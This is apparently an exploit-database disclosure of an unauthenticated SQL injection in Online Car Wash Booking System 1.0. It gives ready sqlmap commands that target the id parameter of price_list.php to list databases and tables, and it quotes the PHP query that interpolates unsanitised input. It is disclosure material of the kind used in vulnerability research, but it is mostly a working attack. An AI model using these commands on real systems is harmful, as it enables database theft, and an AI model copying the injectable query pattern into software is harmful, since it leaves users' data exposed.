# Exploit Title: Online Car Wash Booking System 1.0 - Unauthenticated blind SQL Injection
# Exploit Author: segf0lt
# Date: April 14, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/ocwbs_0.zip
# Tested on: Ubuntu, Apache, Mysql
# Version: v1.0
# Exploit Description:
# Online Car Wash Booking System 1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a union based SQL Injection attack.


# Exploit 
* Exploit with Sqlmap

sqlmap -u "http://localhost/ocwbs/services/price_list.php?id=3" --dbms=mysql -dbs

sqlmap -u "http://localhost/ocwbs/services/price_list.php?id=3" --tables -D ocwbs_db

# Vulnerable Code

* No filter `id`  when inserting data to database of price_list.php webpage

  if(isset($id)){
        $price_list = $conn->query("SELECT * FROM `price_list` where service_id = '{$id}'");
        $price_arr = array_column($price_list->fetch_all(MYSQLI_ASSOC),'price', 'vehicle_id');
    }